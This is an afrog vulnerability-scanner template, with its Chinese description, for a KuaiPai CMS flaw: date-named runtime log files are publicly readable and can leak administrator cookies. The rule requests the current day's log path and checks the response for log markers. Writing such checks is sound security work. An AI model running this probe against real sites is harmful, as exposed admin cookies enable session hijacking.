kpcms-socket-login-info-disclosure: 快排CMS Socket.php 日志信息泄露漏洞

漏洞描述

快排CMS 默认开启日志记录，由于日志名为时间作为文件名，造成管理员的Cookie泄露

PoC代码[已公开]

id: kpcms-socket-login-info-disclosure

info:
  name: 快排CMS Socket.php 日志信息泄露漏洞
  author: daffainfo
  severity: medium
  verified: false
  description: 快排CMS 默认开启日志记录，由于日志名为时间作为文件名，造成管理员的Cookie泄露
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/%E5%BF%AB%E6%8E%92CMS%20Socket.php%20%E6%97%A5%E5%BF%97%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md

set:
  foldername: year(0) + month(0)
  filename: day(0)
rules:
  r0:
    request:
      method: GET
      path: /runtime/log/{{foldername}}/{{filename}}.log
    expression: response.status == 200 && response.body.bcontains(b'运行时间') && response.body.bcontains(b'吞吐率') && response.body.bcontains(b'内存消耗')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/kpcms-socket-login-info-disclosure.yaml